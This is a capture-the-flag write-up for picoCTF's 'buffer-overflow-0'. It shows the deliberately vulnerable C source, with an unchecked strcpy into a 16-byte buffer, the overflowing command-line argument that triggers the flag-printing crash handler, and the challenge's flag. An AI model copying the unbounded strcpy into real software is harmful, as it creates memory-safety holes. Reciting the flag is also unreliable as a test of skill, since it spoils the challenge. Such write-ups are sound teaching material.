Information
Points | Category | Level |
---|---|---|
150 | Binary Exploitation | Easy |
Challenge
Let’s start off simple, can you overflow the right buffer in this program to get the flag? You can also find it in /problems/buffer-overflow-0_1_316c391426b9319fbdfb523ee15b37db on the shell server. Source.
Hint
- How can you trigger the flag to print?
- If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren’t expecting.
Solution
Let’s download the files, we have a execution file and a source file
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
fprintf(stderr, "%s\n", flag);
fflush(stderr);
exit(1);
}
void vuln(char *input){
char buf[16];
strcpy(buf, input);
}
int main(int argc, char **argv){
//open the flag.txt file
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
exit(0);
}
//Read from the file to flag
fgets(flag,FLAGSIZE_MAX,f);
//If there is a SIGSEGV run sigsegv_handler
signal(SIGSEGV, sigsegv_handler);
//gid settings
gid_t gid = getegid();
setresgid(gid, gid, gid);
//Need 1 argument to run the program
if (argc > 1) {
#run vuln with this argument
vuln(argv[1]);
printf("Thanks! Received: %s", argv[1]);
}
else
printf("This program takes 1 argument.\n");
return 0;
}
so basically we can see that if there is a SIGSEGV (segmentation falut) the program run
sigsegv_handler function that print the flag we want.
So how could we cause a SIGSEGV?
I took another look on the code and found that a vuln function called with the argument
I supplied in the running of the program, so this is what I have a control on.
So let’s take another look on the function:
void vuln(char *input){
char buf[16];
strcpy(buf, input);
}
The function take the argument and a buffer sized 16 bytes and call the strcpy function.
strcpy function - copy data from src to dest
char *strcpy(char *dest, const char *src)
Our dest size is 16 byte, and src size is unlimited because we can choose whatever we want
to be the src (argument to the run command).
So if we choose an argument bigger than 16 bytes there will be a SIGSEGV.
Let’s check it in our computer, create a file named “flag.txt” in the folder of the vuln file,
and write in it whatever you want, I chose “Wow here is the flag”.
Now run the execution file with a bigger argument like:
./vuln IamBiggerThan16BytesNow!!!!!!!!!!!!!!!!!
and the text we wrote in the file now printed in the console.
So do the same thing in the shell of picoCTF in order to read the actual flag file:
1. cd /problems/buffer-overflow-0_1_316c391426b9319fbdfb523ee15b37db
2. /.vuln IamBiggerThan16BytesNow!!!!!!!!!!!!!!!!!
Flag
picoCTF{ov3rfl0ws_ar3nt_that_bad_3598a894}